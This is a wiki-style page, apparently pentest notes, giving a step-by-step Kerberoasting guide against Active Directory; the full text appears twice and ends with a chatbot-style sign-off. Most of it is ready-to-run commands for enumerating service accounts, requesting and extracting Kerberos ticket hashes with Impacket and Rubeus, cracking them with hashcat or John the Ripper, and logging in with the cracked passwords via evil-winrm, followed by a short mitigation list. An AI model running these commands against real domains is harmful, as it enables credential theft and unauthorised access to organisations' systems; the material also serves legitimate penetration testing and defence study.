Kerberoasting Attack Step by Step Guide

Step 1: Enumerate Domain Users with SPN

Kerberoasting targets accounts with Service Principal Names (SPNs). First, enumerate users with SPNs.

Command:

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Alternatively, using Impacket:

GetUserSPNs.py -dc-ip <Domain_Controller_IP> <DOMAIN>/<User>:<Password>

Step 2: Request a Ticket Granting Service (TGS) Ticket

Once an SPN is found, request a TGS ticket for that service.

Command:

GetUserSPNs.py -request -dc-ip <Domain_Controller_IP> <DOMAIN>/<User>:<Password>

or using Rubeus:

Rubeus.exe kerberoast

Step 3: Extract and Save TGS Hashes

The obtained TGS hash can be extracted for offline cracking.

Command:

Rubeus.exe kerberoast /format:hashcat

Invoke-Kerberoast | Format-Table -AutoSize

Step 4: Crack the TGS Hash Offline

Use Hashcat to crack the extracted hash.

Command:

hashcat -m 13100 <hashfile> /path/to/wordlist.txt --force

or using John the Ripper:

john --format=krb5tgs --wordlist=/path/to/wordlist.txt <hashfile>

Step 5: Use the Obtained Credentials

If the hash is successfully cracked, use the password to access the service or escalate privileges.

Command to test access:

New-PSSession -ComputerName <Target_Machine> -Credential <DOMAIN>\<User>

or using Evil-WinRM:

evil-winrm -i <Target_IP> -u <User> -p <Password>

Mitigation Steps:

Enforce strong passwords for service accounts.
Regularly rotate service account passwords.
Implement the principle of least privilege.
Monitor Kerberos ticket requests for anomalies.

Let me know if you need additional details or modifications!

PreviousKerberoasting Attack Step by Step Guide Next7.An ACE in the Hole

Last updated 12 days ago

Kerberoasting Attack Step by Step Guide

Step 1: Enumerate Domain Users with SPN

Kerberoasting targets accounts with Service Principal Names (SPNs). First, enumerate users with SPNs.

Command:

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Alternatively, using Impacket:

GetUserSPNs.py -dc-ip <Domain_Controller_IP> <DOMAIN>/<User>:<Password>

Step 2: Request a Ticket Granting Service (TGS) Ticket

Once an SPN is found, request a TGS ticket for that service.

Command:

GetUserSPNs.py -request -dc-ip <Domain_Controller_IP> <DOMAIN>/<User>:<Password>

or using Rubeus:

Rubeus.exe kerberoast

Step 3: Extract and Save TGS Hashes

The obtained TGS hash can be extracted for offline cracking.

Command:

Rubeus.exe kerberoast /format:hashcat

Invoke-Kerberoast | Format-Table -AutoSize

Step 4: Crack the TGS Hash Offline

Use Hashcat to crack the extracted hash.

Command:

hashcat -m 13100 <hashfile> /path/to/wordlist.txt --force

or using John the Ripper:

john --format=krb5tgs --wordlist=/path/to/wordlist.txt <hashfile>

Step 5: Use the Obtained Credentials

If the hash is successfully cracked, use the password to access the service or escalate privileges.

Command to test access:

New-PSSession -ComputerName <Target_Machine> -Credential <DOMAIN>\<User>

or using Evil-WinRM:

evil-winrm -i <Target_IP> -u <User> -p <Password>

Mitigation Steps:

Enforce strong passwords for service accounts.
Regularly rotate service account passwords.
Implement the principle of least privilege.
Monitor Kerberos ticket requests for anomalies.

Let me know if you need additional details or modifications!

PreviousKerberoasting Attack Step by Step Guide Next7.An ACE in the Hole

Last updated 12 days ago